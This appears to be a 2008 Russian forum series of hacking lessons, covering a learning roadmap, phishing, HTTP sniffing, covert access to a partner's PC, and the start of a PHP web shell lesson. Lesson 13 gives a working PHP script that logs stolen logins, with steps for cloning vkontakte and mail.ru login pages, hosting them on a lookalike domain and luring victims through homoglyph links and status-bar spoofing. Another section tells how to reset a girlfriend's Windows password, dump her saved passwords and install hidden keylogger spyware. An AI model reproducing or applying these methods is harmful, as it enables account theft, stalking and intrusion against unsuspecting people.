3)На третем пункте мнения могут разайтись....но я скажу что PHP
4)SQL запросы
5)jаvаsсript
6)Perl
7)UNIX
//вообще Юникс по возможности надо изучать параллельно со всеми остальными пунктами...ибо сейчас почти все сервера держатся на нём.
8)Python
9)ASP/ASPX

Это всё то , что необходимо знать любому Хакеру....если даже не всё.....то железно нужно знать первые 5 пунктов...и именно в такой хронологии...

Моей главной ошибкой в начале изучения была .....не компитентность в структуре сайта.....(я не знал как работает сайт....что это такое , а уже просматривал видео по взлому) так вот если вы хотите подойти ко взлому серьёздно...то первым делом вам надо изучить структуру сайта....и понять ,что сайт это простые файлы....которые лежат на другом компьютере....а вы этот файл просматриваете через специальную программу.......

После того как вы поймёте , что такое сайт....как он устроен.....получите хотябы начальные знания по php и jаvаsсript вы сможете смело переходить к следующему этапу.....это непосредственное изучение методов взлома.....
Что собственно я вам продемонстрировал...в моих урока....
То что я написал вам поможет.....но для того ,чтобы применять что то осознанно....и ломать не то что можешь...а то что хочешь....нужно делать всё осознанно.....а для этого нужно знать язык(и) программирования =D

Тут конечно я для вас сразу же становлюсь снобом.....но это так.....на начальном этапе я всех людей говорящих мне ,что без знания языка(ов) ты ничего не сможешь , просто посылал в топку =)))и зря это делал....думаю сейчас бы я добился большего...чем имею.....(знания)

Ну а после того как я уже наконец то изучил SQL и PHP я начал читать разные статьи с
antichat.ru и параллельно смотреть видео по взлому video.antichat.ru //На тот момент это был самй актуальный сайт....на эту тематику....
А сейчас уже много аналогов появилось ( http://www.inattack.ru/group_article/45.html ) ....и по разным мнениям кто то их считает лучше ...кто то хуже.....
Лично я учился вот как
antichat + google + Журнал Хакер + Книги купленные по тематике.....
Кстати относительно старую мою библиотеку вы можете посмотреть по фотке =) http://rs.foto.radikal.ru/0709/79/936013da7298.jpg
Не помню когда это было....нашёл в поисковике.....

Из книг которые мне помогли могу отметить .....
1)WEB-сервер глазами Хакера
2)Исскуство Эксплойта Джон Эриксон

Всё остальное что я читал было либо фуфло...либо не относилось ко взлому.....
Могу привести пример первосортного фуфла....эта книга "Хакинг и Антихакинг" такой фиговой книги даже в свои 15 лет я нигде тогда не видел Х-) кому интересно можете посмотретьhttp://www.knigka.info/2007/04/21/bystro_i_legko_khaking_i_antikhaking_zashhita_i_napadenie.html

Ну и естественно вам надо знать ссылки...на самые свежие найденые уязвимости
wwwsecuritylab.ru
http://www.cyberinfo.ru/2/index.htm
Ну и такой наиизвеснейший ресурс среди хакеров это
http://milw0rm.com/
Там есть самые свежие Эксплойты....крякер MD5 (онлайн)....и еще куча куча всего....вообщем сами зайдёте посмотрите.....
НО есть одно НО...если вы не знаете английского.....не сладко вам прийдётся....поэтому прибавляйте ко всем пунктам которые я написал десятый.... 10)Знание Английского
Эксплой - http://ru.wikipedia.org/wiki/Эксплойт
Да и вообще большинство документации от разных хакерских программ и Эксплойтов идут на английском языке...

Вывод

1)Мы сняли вопрос "С чего начать?" раз и навсегда....
2)Я поделился своим опытом...и надеюсь вы не повторите мои ошибки в дальнейшем....(изучение ненужных языков,параллельное изучение одинаковых по синтаксису языков итд.)
3)Вы теперь имеете полное представление о том как надо продивигатсья ....
4)Узнали что такое Эксплойт =) и где его искать.....
//от себя хочу добавить Эксплойт это что то на подобии руководства к действию(для взлома)...ибо авторы написанного эксплойта делают комментарии и изучив их вы сможете легко ориентироваться в написанном коде.....

_______________________________________________________________________________________________
Я считаю что этот урок должен снять почти все вопросы в плане изучения.....
И надеюсь вам он хочь чуть чуть....но поможет.....не смотря на то ,что тут мало конкретной информации про взлом.
Можно пропустить.
_______________________________________________________
Я таки вернулся....извиняюсь ,что так долго небыло.....даже
сейчас пишу в замен своей оценке по МЭО =)))у нас сегодня будет
зачёт по этому предмету =)))Ну надеюсь вы этот урок оцените...ибо он будет
посвящён...
_______________________________________________________

Урок 13.

Создаём собственный фейк!

Фейк произошло от Английского слова fake — подделка.

В нашем случае мы будем подделывать странички авторизации , для того чтобы заполучить заветный логин:пароль от любого сайта.
Я встречал много тем....там где продают фейки....а люди даже их покупают.....  запомните всё самое лучшее можете сделать вы сами....и делаете это вы бесплатно!ну и перед тем как начать....хочу сказать ,что создание фейков это очень лёгкое дело....
Моё главное требование к этому уроку это знание html.
Не смотря на то ,что я буду использовать php(файлик)...знание его вам в этом уроке вообще не понадобится!

Создаём фейк Vkontakte

1)Первым делом зайдём на страничку Vkontakte.ru
//И если вы зашли под своей учётной записью выйдите из неё.
Перед вами должна открыться страничка "Добро пожаловать" её мы и будем потделывать.
2)Создаём папку на рабочем столе под названием sait
После чего сохраняем страничку vkontakte.ru (добро пожаловать)вот таким способом....в

-Firefox (Файл---Сохранить как...---(далее переходим в ту папку куда сохранять "sait")---(Выбираем тип страницы "Веб-страница полностью" ,a имя файла даёте index.html)
-Opera(Файл---Сохранить как---(переходим в папку sait)---(Выбираем тип файла "HTML файл с изображениями" имя файла index.html)
-Internet Explorer(Файл---Сохранить как---(Выбираем тип фалйа "Веб-страница полностью" имя файла index.html)
_________________________________________________________________________________________________________
Но не делайте пожалуйста очень популярной ошибки.....такой как index.html.html , index.html.mnt //двойное расширение.
Для того чтобы её избежать этой ошибки поставьте у себя в настройках:
Панель управления---Свойство папки---(вкладка) вид---(и снять галку с поля)"Скрывать расширения для зарегистрированных типов файлов"--ОК
И теперь у ваших файлов всегда будет отображаться расширение!
__________________________________________________________________________________________________________

И так мы сохранили страничку полностью!
Теперь если мы откроем наш index.html мы увидим ,что у нас полностью идентичная страничка!(Для этого мы и сохраняли не только html но и сами картинки).

3)Теперь нам надо подредактировать код этой странички так, чтобы когда пользователь ввёл логин и пароль....на нашей страничке все пароли сохранились у нас на сервере.....
для этого нам понадобится один php файлик с таким содержанием.
_________________________________________________________________________
<?
$Login = $_POST['login']; // Логин...
$Pass = $_POST['passwd']; // Пароль...
$log = fopen("base.php","a+"); //открываем файл хранилища...
fwrite($log,"<br> $Login:$Pass \n"); //записываем всё в хранишище...
fclose($log); //закрываем хранилище
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru'></head></html>"; // перенаправляем пользвателя на любую //ссылку в данном случае http://vkontakte.ru
?>
_________________________________________________________________________

Сохраняем этот файлик под названием log.php
И создаём файлик base.php //с пустым содержанием.
Да, и всё это мы сохраняем в папку sait там где у нас лежит наш будущий фейк.

4)Теперь перейдём непосредственно к редактированию index.html
Открываем его в любом редакторе (блокноте или NotePad++) //Очень рекомендую всем кто занимается кодингом использовать NotePad++ удобно.

И всё ,что нам нужно для создания собственного фейка это
4.1)Найти Форму для регистрации<form ....
4.2)Присвоить ей значение action="log.php" тоесть получится <form action="log.php" ....>
4.3)И в поле name присвоить login или passwd(name="login" ,name="passwd")

Не пугайтесь сейчас всё поясню на примере.... 
А пока знайте ....что значения в поле name (login , passwd) присваиваются именно такие ,потому как я им присвоил значение в моём мини php скрипте....(я их выделили жирным цветом)
А при помощи action="log.php" мы форме говорим "ДЕЛАЙ ТО ,ЧТО НАПИСАНО В ЭТОМ СКРИПТЕ!".

И так поехали....

1)Ищем форму которая занимается авторизацией!
Делаем мы это так....
Открываем наш index.html при помощи блокнота....
жмём: Правка---Найти---(ищем вот что...) <form
И первое ,что нам выдаётся это вот эта строчка...

<form method="post" name="login" id="login" action="login.php">

Это то что нам нужно! мы по интуиции догадались....что наверное action="login.php" выполняет скрипт для входа в систему....=) тут и ёж поймёт...
Теперь нам надо ,чтобы вместо ихнего скрипта выполнялся наш....значит пишем так....

<form method="post" name="login" id="login" action="log.php">

Далее нам уже надо искать <input в который идёт информация о Логине....Вконтакте это поле называют Email.
Пробуем искать.....и находим вот такую строчку....

<input class="inputText" onclick="show('expirePad');" name="email" id="email" size="20" type="text">

Меняем ,как я уже говорил на наше значение.....name="login" и у нас плучается

<input class="inputText" onclick="show('expirePad');" name="login" id="email" size="20" type="text">

Точно так же ....глазками ищем что то похожое на password или pass и мы находим

<input class="inputText" onclick="show('expirePad');" name="pass" id="pass" size="20" type="password">

Заменяем на наше значение....

<input class="inputText" onclick="show('expirePad');" name="passwd" id="pass" size="20" type="password">

Вот и всё....наш фейк готов! =)))
А вы думали ,что это тяжело....или вообще не думали 

Теперь нам надо его опробовать....
Я вам говорил ,что для наших нужд понадобится....сервер.....можете проверить всё на вашем компьютере(локальном серевере)//PHP+Apach+MySQL см прошлые уроки.

Либо сделать как я =)))выложить своё творение на бесплатный хостинг t35.com =)))

Я зарегал себе там бесплатный акаутн.....так как там есть всё ,что нам нужно php+FTP
Если хотите посмотреть на мой фейк...то он расположен тут http://vkontaktee.t35.com

При выборе моего пути надеюсь трудностей не возникло....(регистрация)
После того как вы зарегистрировались.....вы можете выкладывать свой сайт....
Делается это чень просто.....открываем "Мой компьютер" и в том месте где написанно "Мой компьютер" (адресная строка) прописываем ftpt35.com
Далее в появившимся окошке вводим
Логин и Пароль....вашей учётной записи....вот такого вида...
vkontaktee.t35.com : qwertypass
После чего у вы подключитесь к серверу.....и это у вас будет выглядеть...как будто вы находитесь в папке ...в которой ничего нету....
Так вот это называется корневая директория .....переносим туда все наши файлы....
1)index.html
2)полностью папку(с изображениями которая была создана вместе с index.html иначе у нас не будет никаких картинок и логотипов.)
3)base.php
4)log.php

Теперь ваш фейк полностью готов к применению.

Проверяем его работоспособность.....
Заходим на свою страничку.....допустим vkontaktee.t35.com
И проходим авторизацию......(как мы это делаем обычно)
после чего......переходим по ссылке vkontaktee.t35.com/base.php

И видим ,что у нас записался логин и пароль......в файлик base.php
Всё.

Давайте для закрепления матерьяла рассмотрим еще один пример с mail.ru

Создаём собственный фейк для mail.ru

Поехали по схеме....
1)сохраняем нашу страничку со всеми картинками и всяким бредом.....и называем её index.html
2)Открываем и начинаем редактировать....
ищем форму для авторизации <form (там где action= хоть как то похож на автризацию......)
вот что мы нашли....

<form name="Auth" method="post" action="http://win.mail.ru/cgi-bin/auth"> //очень похожо на авторизацию не правда ли ?

Заменяем на

<form name="Auth" method="post" action="log.php">

продолжаем идти по схеме...и ищем <input  связанный хоть как то с login и password

и мы находим эти поля

<input type="text" class="long" size="10" name="Login" tabindex="1" value="" />

<input type="password" class="long" size="15" name="Password" tabindex="3" value="" />

Меняем их на наши значения....login и passwd  // хочу сразу заметить ,что регистр очень важен....Login и login  разные вещи!

<input type="text" class="long" size="10" name="login" tabindex="1" value="" />

<input type="password" class="long" size="15" name="passwd" tabindex="3" value="" />

вот и всё....фейк готов....

Те кто знают html могут сделать этот фейк из любительского....в профессиональный....(тоесть при переходе по ссылкам в этих страничках....ты всёравно выходишь на фэйковский ресурс....)

Тот же Вконтакте ....мне было просто лень делать тоже самое но только в том случае если жертва нажмёт не на вход ,а на ,допустим Регистрацию или допустим на смену языка........короче это всё делается по токому же принцыпу.....и надеюсь хоть чуть чуть он вам стал понятен....
"Надо учить формы }=) "

----------------------------------------------------------------------------------
Но....вы наверное возмутитесь.....если я вам скажу ,что все сворованные пароли может посмотреть любой проходимец....да это факт....как с этим бороться.....учить php... и моё к вам задание сделайте так...,чтобы файлик base.php не мог просматриваться посторонними лицами...НО! при этом ,чтобы он оставался работоспособным!
это я вам на всякий случай сказал...чтобы небыло тут баталий....а я могу твои данный стянуть, учитесь защите.
----------------------------------------------------------------------------------

если кому то всё еще не понятно как делаются фейки.....я для вас выложил свои 4 фейка....в качестве примера......
vkontakte.ru
forum.xakep.ru
Gmail.com
mail.ru
сюда http://vkontaktee.t35.com/fakes_By_Xakep9009.rar

Несколько способов впарить фейк

Ну и теперь парочку примеров из практики....
1)
чаще всего я свои фейки прячу в ссылки на форумах....или в почте......в ICQ к сожалению такой фишки как --
Тоесть я прячу нашу ссылку вот так..... пишу httр://vkоntаktе.ru только малая хитрость заключается в том ,что
в место p - английской...я написал букву р -русскую .....в место о - английской  о -русскую.....ну вы поняли логику.....таким образом у нас из [link=http://vk%D0%BEntakte.ru]http://vkоntakte.ru[/link] получился обычный текст ....а не ссылка....а во всех форумах и почтовых серверах(или почти во всех) есть функция вставлять ссылку в слова.....
типо скачивать >>>>>сюда<<<<<

Это был первый способ....

Второй мне больше по душе =)))на него ловятся 99,9% людей.....

Хакеры это хорошие психологи....и любой хакер должен знать не только слабость ресурса(сайта) но и его хозяйна.....
И поэтому заявления ,что СИ (соц инженерия) это не по хакрески это полная глупость
почитайте кстати про [link=http://ru.wikipedia.org/wiki/%D0%A1%D0%BE%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%B0%D1%8F_%D0%B8%D0%BD%D0%B6%D0%B5%D0%BD%D0%B5%D1%80%D0%B8%D1%8F]Социальную Инженерию[/link]
Меня уже несколько раз просили написать про СИ....вот один из моих любимых примеров внедрения фейка при помощи СИ....

Я говорю / пишу жертве , что нашёл обалочку...через которую можно подключиться к сайту вконтакте.....и качать от тудо музыку , кино, просматривать скрытую информацию. (этот способ использую тогда , когда скрыть ссылку почти невозможно) но он эффективен как я уже говорил на 99,9% =D ибо алчность людей до безумства сводит......
Кстати хакеров тоже....так что не будьте алчными....

Еще один способ это подмена URL (адресной строки) в строке состояния.....тобишь то,что вы видите наведя курсором на ссылку.
Но его можно использовать только если жертва сидит под IE (что бывает в большинстве случев)

и так пишем html код

<a href="http://vkontaktee.t35.com/"
onMouseOver="window.status = 'http://vkontakte.ru';
return true;"
onMouseOut="window.status='';">http://vkontakte.com</a>

Теперь при наведении на ссылку у нас в левом нижнем углу будет высвечиваться vkontakte.ru а не мой фейк_)

Каждый из вас может придумать свой способ....и пользоваться им!=) и он будет успешным))Так что не расчитывайте на других...учитесь думать сами.....я вот учусь =-) хоть и безуспешно ^^

Вывод

1)Мы сегодня познакомились с вами еще с одним видом атаки на WEB сайты.
2)Повторили что такое ftp .
3)Рассмотрели несколько способов "впаривания фейков".
4)Поняли ,что фейк может создать любой....лижбы было желание.
5)Поставили точку в обсуждении о нужности СИ (соц. инженерии). НУЖНА.
6)Повторили html =)
7)Ну и самое главное научились делать фейк!и нам теперь ненадо постить "люди создайте фейк от forum.sex.ru" =)

______________________________________________________________________________

Надеюсь этот урок вам понравится =-)
И вы узнаете \ узнали что то новое!
Удачи!

< Сообщение отредактировано Xakep9009 -- 17.11.2008 4:36:08 >
Урок 14.

Фишки от Xakep9009

HTTP это HyperText Transfer Protocol — протокол передачи гипертекста.
Более подробно смотрите тут http://ru.wikipedia.org/wiki/HTTP

Sniffer - от английского слова нюхать. - Сетевой анализ трафика (не пугайтесь , звучит угрожающе...на самом деле ерунда , на примере всё поймёте.)
Более подробно смотрите тут http://ru.wikipedia.org/wiki/Sniffer

Для того чтобы просматривать весь проходящий трафик...нам нужно будет скачать такую программу как EffeTechHTTPSniffer

Она понадобится для того ,чтобы на более низком уровне просматривать весть проходящий трафик по HTTP протоколу....
Эту программу вы можете найти тут.
http://narod.ru/disk/3930462000/EffeTec … r.rar.html

После того как вы её установили....мы перейдём к фишкам....которых я 4 недели назад искал и ничего об этом не нашёл....

Обманываем обманщиков.

Под обманщиками я понимаю такие сайты как vkontakte.ru и weborama.ru
Почему они обманщики?....а потому что выкладывать музыку можно....а скачать нельзя....что за бред?

Ну так давайте обманим тех кто обманывает нас....и научимся скачивать музыку с любого сайта....(где она есть естественно =) )

Качаем музыку с Vkontakte.ru

//Хочу сразу сказать...что все эти манипуляции я проделывал в Firefox ....с установленным Flash плеером...поэтому если у тебя не установлен //флеш плеер...установи...
ВАЖНО не жмите проигрывание песни до Сниффера
1)Находим нужную нам песню....(в контакте)
2)Не нажимая на проигрывание песни переходим к нашему Снифферу...
3)Жмём Start и наш сниффер начинает работу.
4)Нажимаем на проигрывание песни....ждём пока вы не увидите ,что сниффер перестал ловить пакеты от контакта.
5)Выключаем сниффер (Stop Sniffer)
6)И теперь нам надо из полученных пакетов определить где же наша песня...

А сделать это легко....я просил вас в самом начале не жать проигрывание этой песни...до запуска сниффера...ибо нам важен момент подключения к этой песне....(перехват момента подключения) и этот момент и будет содержать в себе прямую ссылку на этот файл!

Тоесть если вы всё правильно сделали....то у вас в логе сниффера должна была появится примерно такая строчка....
http://cs1334.vkontakte.ru/u5970851/aud … 89b197.mp3

Это и будет прямая ссылка на файл)))

Тоесть в вашем сниффере должна появиться строка с такими значениями
Server(IP:Port) = http://cs1334.vkontakte.ru
URL = /u5970851/audio/f222da89b197.mp3
Это и есть прямая ссылка....на файл....только в разбитом виде....(чтобы получить её полностью вы можете нажать в сниффере на это поле два раза потом перейти во вкладку Content и вот она ваша ссылка полностью)!

7)После того как вы получили ссыку такого вида....
[link=http://cs1334.vkontakte.ru/u5970851/audio/f222da89b197.mp3%C2%A0]http://cs1334.vkontakte.ru/u5970851/audio/f222da89b197.mp3 [/link] переходим по ней....далее
Файл --- Сохранить как --- Тип (все файлы) \ имя (на своё усмотрение).mp3---сохранить.

___________________________________________________________________________
для закрепления...

Качаем видео с Vkontakte.ru

Надеюсь вы поняли ,что на одной музыке мы не остановимся!!!и никаких сервисов для скачивания видео с контакта нам не нужно мы Хакеры мы свободные люди!(пока ^^)
Так вот...поехали...
1)Открываем страничку с видео....(НО НЕ ПРОСМАТРИВАЕМ)
2)Включаем Наш сниффер!
3)Ждём пакетов от контакта....
4)Получаем пакет с подключением....вот такого типа...
http://195.218.181.192/assets/videos/8c … 271.vk.flv
и он же является прямой ссылкой на скачку этого файла....
5)Качаем.//Надеюсь объяснять про flv файлы ненадо....=)
________________________________________________________________

Теперь что же делать если вы всётаки нажали на просмотр\прослушку раньше чем вы включили наш сниффер!
Вам надо удалить все личные данные....(которые браузер сохраняет автоматически.)Делается это в Свойствах или Настройках//в разных браузерах по разному

Теперь проделаем тоже самое с weborama.ru

1)Выбираем песню которую хотим прслушать(но не прослушиваем)
2)Запускаем Сниффер
3)Ждём буквально секунд 10
4)и на Вебораме сделали....поумнее....они спрятали .mp3  в ссылку такого вида
http://static1.weborama.ru/audio/f2/f2b … 2edc7693e5

Как увидили....
Server: http://static1.weborama.ru URL: /audio/f2/f2b5e251369c5ee01931522edc7693e5
Без сомнений копируйте ссылку....и вставляйте в браузер....
После чего подождите пока он обработает запрос....и выдаст вам файл....который вы сможете сохранить как mp3
----------------------------------------------

Это я вам привёл всего несколько возможностей HTTP Sniff`ера....

А те кто удосужились выучить html могут гораздо больше!)

Так же HTTP сниффер используют для нахождения уязвимостей таких как SQL уязвимостей так....и всех о которых я уже писал....так как в адресной строке передаются параметры...которые обычно спрятанны...а при детальном анализе мы сможем применить эту информацию для взлома....
Так же Сниффер можно использовать против пинча....(запустить сниффер , а затем пинч тем самым перехватить Логин и пароль от почты, от сайта.....короче куда отчёты он шлёт)

Так что возьмите себе на заметку такую мощную вещь!

Вывод
1)Узнали что такое HTTP sniffer
2)Мы узнали ,что мы не все процессы видим...которые выполняет наш браузер!
3)Поняли ,что он нам очень поможет в нахождении и реализации уязвимостей.
4)Научились обманывать обманщиков....

______________________________________________________
Надеюсь этот урок вам чем то поможет...и вы из него узнали что то новое.
Моё пожелание заключается в том..., чтобы вы повозились с HTTP Sniffer`oм побольше...
Практика - залог успеха!
Удачи.

< Сообщение отредактировано Xakep9009 -- 23.11.2008 2:41:31 >

1.IP-адрес (aй-пи адрес, сокращение от англ. Internet Protocol Address) — уникальный идентификатор (адрес) устройства (обычно компьютера), подключённого к локальной сети и (или) интернету. IP-адрес представляет собой 32-битовое (по версии IPv4) или 128-битовое (по версии IPv6) двоичное число. Удобной формой записи IP-адреса (IPv4) является запись в виде четырёх десятичных чисел (от 0 до 255), разделённых точками, например, 192.168.0.1. (или 128.10.2.30 — традиционная десятичная форма представления адреса, а 10000000 00001010 00000010 00011110 — двоичная форма представления этого же адреса). IP-адреса представляют собой основной тип адресов, на основании которых сетевой уровень протокола IP передаёт пакеты между сетями. IP-адрес назначается администратором во время конфигурирования компьютеров и маршрутизаторов. IP-адрес состоит из двух частей: номера сети и номера узла. В случае изолированной сети её адрес может быть выбран администратором из специально зарезервированных для таких сетей блоков адресов (192.168.0.0/16, 172.16.0.0/12 или 10.0.0.0/8). Если же сеть должна работать как составная часть Интернета, то адрес сети выдаётся провайдером либо pегиональным интернет-регистратором (Regional Internet Registry, RIR). Согласно [1] существует пять RIR: ARIN, обслуживающий Северную Америку; APNIC, обслуживающий страны Юго-Восточной Азии; AfriNIC, обслуживающий страны Африки; LACNIC, обслуживающий страны Южной Америки и бассейна Карибского моря; и RIPE NCC, обслуживающий Европу, Центральную Азию, Ближний Восток. Региональные регистраторы получают номера автономных систем и большие блоки адресов у IANA, а затем выдают номера автономных систем и блоки адресов меньшего размера локальным интернет-регистраторам (Local Internet Registries, LIR), обычно являющимся крупными провайдерами.
2. MAC-адрес (от англ. Media Access Control — управление доступом к носителю) — это уникальный идентификатор, сопоставляемый с различными типами оборудования для компьютерных сетей. Большинство сетевых протоколов канального уровня используют одно из трёх пространств MAC-адресов, управляемых IEEE: MAC-48, EUI-48 и EUI-64. Адреса в каждом из пространств теоретически должны быть глобально уникальными. Не все протоколы используют MAC-адреса, и не все протоколы, использующие MAC-адреса, нуждаются в подобной уникальности этих адресов.
3. Стек протоколов TCP/IP (англ. Transmission Control Protocol/Internet Protocol) — собирательное название для сетевых протоколов разных уровней, используемых в сетях. В модели OSI данный стек занимает (реализует) все уровни и делится сам на 4 уровня: прикладной, транспортный, межсетевой, уровень доступа к сети (в OSI это уровни - физический, канальный и частично сетевой). На стеке протоколов TCP/IP построено всё взаимодействие пользователей в сети, от программной оболочки до канального уровня модели OSI. По сути это база, на которой завязано всё взаимодействие. При этом стек является независимым от физической среды передачи данных.
4. FTP (англ. File Transfer Protocol — протокол передачи файлов) — протокол, предназначенный для передачи файлов в компьютерных сетях. FTP позволяет подключаться к серверам FTP, просматривать содержимое каталогов и загружать файлы с сервера или на сервер; кроме того, возможен режим передачи файлов между серверами (см. FXP). FTP является одним из старейших прикладных протоколов, появившимся задолго до HTTP, в 1971 году. До начала 90-х годов на долю FTP приходилось около половины трафика в сети Интернет[источник?]. Он и сегодня широко используется для распространения ПО и доступа к удалённым хостам. Протокол FTP относится к протоколам прикладного уровня и для передачи данных использует транспортный протокол TCP. Команды и данные, в отличие от большинства других протоколов передаются по разным портам. Порт 20 используется для передачи данных, порт 21 для передачи команд. Протокол не шифруется, при аутентификации передаёт логин и пароль открытым текстом. Если злоумышленник находится в одном сегменте сети с пользователем FTP, то, используя сниффер, он может перехватить логин и пароль пользователя, или, при наличии специального ПО, получать передаваемые по FTP файлы без авторизации. Чтобы предотвратить перехват трафика, необходимо использовать протокол шифрования данных SSL, который поддерживается многими современными FTP-серверами и некоторыми FTP-клиентами.
5. TELNET (англ. TELecommunication NETwork) — сетевой протокол для реализации текстового интерфейса по сети (в современной форме — при помощи транспорта TCP). Название «telnet» имеют также некоторые утилиты, реализующие клиентскую часть протокола. Хотя в сессии Telnet выделяют клиентскую и серверную сторону, протокол на самом деле полностью симметричен. После установления транспортного соединения (как правило, TCP) оба его конца играют роль «сетевых виртуальных терминалов» (англ. Network Virtual Terminal, NVT), обменивающихся двумя типами данных: Прикладными данными (т.е. данными, которые идут от пользователя к текстовому приложению на стороне сервера и обратно) Опциями протокола Telnet, служащими для уяснения возможностей и предпочтений сторон. Прикладные данные проходят через протокол без изменений[1], т.е. на выходе второго виртуального терминала мы видим именно то, что было введено на вход первого. С точки зрения протокола данные представляют просто последовательность байтов (октетов), по умолчанию принадлежащих набору ASCII, но при включенной опции Binary — любых. Хотя были предложены расширения для идентификации набора символов [2], но на практике ими не пользуются. Все значения октетов прикладных данных кроме \377 (десятичное 255) передаются по транспорту как есть. Октет \377 передаётся последовательностью \377\377 из двух октетов. Это связано с тем, что октет \377 используется на транспортном уровне для кодирования опций.
6. Прокси-сервер (от англ. proxy — «представитель, уполномоченный») — служба в компьютерных сетях, позволяющая клиентам выполнять косвенные запросы к другим сетевым службам. Сначала клиент подключается к прокси-серверу и запрашивает какой-либо ресурс (например, e-mail), расположенный на другом сервере. Затем прокси-сервер либо подключается к указанному серверу и получает ресурс у него, либо возвращает ресурс из собственного кеша (в случаях, если прокси имеет свой кеш). В некоторых случаях запрос клиента или ответ сервера может быть изменён прокси-сервером в определённых целях. Также прокси-сервер позволяет защищать клиентский компьютер от некоторых сетевых атак.
7. SOCKS — сетевой протокол, который позволяет клиент-серверным приложениям прозрачно использовать сервисы за межсетевыми экранами (фаерволлами). SOCKS — это сокращение от «SOCKetS» (сокеты, гнёзда). Клиенты за межсетевым экраном, нуждающиеся в доступе к внешним серверам, вместо этого могут соединяться с SOCKS прокси сервером. Такой прокси сервер контролирует права клиента для доступа к внешним ресурсам и передаёт запрос к серверу. SOCKS может использоваться и противоположным способом, разрешая внешним клиентам соединяться с серверами за межсетевым экраном (брандмауэром). В отличие от HTTP прокси серверов, SOCKS передаёт все данные от клиента, ничего не добавляя от себя, то есть с точки зрения конечного сервера, SOCKS прокси является обычным клиентом. SOCKS более универсален — не зависит от конкретных протоколов уровня приложений (7-го уровня модели OSI) и базируется на стандарте TCP/IP - протоколе 4-го уровня. Зато HTTP прокси кэширует данные и может более тщательно фильтровать содержимое передаваемых данных. Этот протокол был разработан Дэвидом Кобласом (David Koblas), системным администратором MIPS Computer Systems. После того, как в 1992 году MIPS вошла в состав Silicon Graphics (SGI), Коблас сделал доклад о SOCKS на Симпозиуме по Безопасности Usenix (Usenix Security Symposium), и SOCKS стал публично доступным. Протокол был расширен до четвёртой версии Ин-Да Ли (Ying-Da Lee) из NEC Systems Laboratory.
8. Shell (командный процессор) - интерпретатор команд, командный язык, процессор командного языка ОС UNIX и ее разновидностей; системная программа, принимающая и исполняющая команды и командные строки с терминала и из командного файла; программа, предоставляющая интерфейс, с которым работают пользователи UNIX-систем.
9.

здравствуй,дружок!!!сейчас я тебе расскажу сказочку...
А точнее научу делать несколько вещей пока твоя подружка или дружок отлучились от компьютера и по неосоторожности оставили тебя рядом с ним.кто то возмутиться что лазить в чужом компьютере это нехорошо и не этично.
я полностью согласен.но такое желание часто меня настигает в самый неподходящий момент.а точнее,когда моя девушка остовляет меня наедине с ее компьютером;))))))

итак у нас есть час времени и доступ к компьютеру интересующего нас человека.следов оставлять не хочеться и что то устанавливать на машину мы не хотим.значит все программы которые мы будем использовать должны быть максимально легкими и работать без инсталяции на компьютер жертвы.сейчас у каждого человека в кармане есть флешка.у тебя тоже есть??умничка!!!вот ее мы и будем использовать.я вообще советую залить на нее джентельменский набор и носить их всегда с собой.лично я так и поступил.никогда не знаешь что когда пригодиться.продолжаем взлом..
Пока владельца нет,мы воровато оглядываемся и включаем компьютер.
у многих на входе стоит пароль.но нас ведь так просто не остановить!!!
для нас уже заготовленна на флешке программа CIA Commander.заходим в БИОС и ставим загрузку с флешки.запускаете CIA выбираем каталог с виндой пользователя и обнуляем его пароль.затем можно назначить новый.после всех нехороших манипуляци,когда все сделаем что хотели мы снова обнулим пароль и пользователь решить что "винда глюкнула и стерся пароль!!!"кому как нравиться .перезагружаемся и теперь зная пароль входим.))))
теперь можно запустить программу для востановления удаленных файлов.иногда можно найти уже удаленные но такие интересные файлы))))для наших целей я рекомендую использовать программу Encopy.она достаточно маленькая и работает напрямую с флешки без установки.
пока Encopy восстанавливает мусор из корзины мы займемся паролями.ведь мы хотим знать все.для слива паролей у меня на флешке стоит программа Multi_Password_Recovery.она маленькая на русском языке и может воровать пароли .запускаем ее.ждем пару секунд пока она соберет пароли потом их сохраняем на флешке.чтобы потом неспеша посмотреть на каких форумах зарегестрирован наш человек что пишут ему в контактеи тому подобное)))
есле у человека есть QIP,то идем C:Program Files\QIP\Users\номер\History и получаем доступ ко всей переписке в асе.она копируеться на флешку.увлекательное чтиво!!!уж мне поверьте))))))
в браузере смотрим историю и закладки.тоже интересно бывает узнать где и что читает человек.
теперь я рекомендуюю оставшееся время посвятить на установку шпионской программы КГБ.с ней вы разберетесь без труда.данная программа может работать в видимом и невидимом режиме.умеет делать скриншоты .счтивать нажатие клавиш и отправлять отчеты.это тем ценно что может в дальнейшем мы не сможем подобраться к компу жертвы.она полностью на русском языке.
наш час истек.теперь мы можем неспеша почитать переписку по асе.имея пароли можем читать почту и посещать страничку в контакте.наша программка КГБ будет нас радовать своимим отчетами и яркими скриншотами.
всем удачной охоты!!!
ссылки на программы: CIA Commander
Encopy
Multi_Password_Recovery
KGB_Spy

Можно пропустить.
_______________________________________________________________
Я рад снова видеть , читать ваши сообщения =)
И я решил , что юбилейный урок (Новогодний) должен быть особенный...
Мне очень хотелось бы его сделать таковым... и в этом юбилейном уроке
я решил написать вам о...
_______________________________________________________________

Урок 15.

Shell

Shell code - (Шелл код)это код который может управлять(отдавать команды) удалённой машиной (компьютером) через командную строку.

Ох как много накрученных слов....но это на первый взгляд....на самом деле всё гораздо проще.....как только вы увидите что это такое.....

Я достал свой маленький архив Шеллов.... для того , чтобы вы посмотрели на практике что это такое....
Скачать можно тут : http://narod.ru/disk/4715943000/shells (copy%203).rar.html

В этом архиве находится 5 разных шеллов , но функции у них почти одни и те же....просто кому какой удобнее)))
Функционал у всех шеллов тоже особо не отличается....но в некоторых больше функций в некоторых меньше....

Перейдём к практике.
Если вы читали мои предыдущие уроки , то у вас уже должен быть установлен ваш локальный сервер....тоесть "localhost", он нам понадобится для того чтобы экспериментировать....

1) Разархивируйте архив с шеллами и у вас появится папка "shells" перенесите папку на ваш локальный сервер...
чтобы путь к папке shells был такой.... localhost/shells
(Вообще это не обязательно...но мы это делаем для того чтобы в дальнейшем вы не растерялись)

2)Теперь давайте откроем Браузер и введём туда localhost/shells/c99madshell.php
И перед вами появится шелл! теперь давайте рассмотрим его по подробнее

Вот так выглядит "Головная" часть шелла....которая показывает всю информацию о Сервере(где расположен шелл).

----------------------------------------------------------------------------
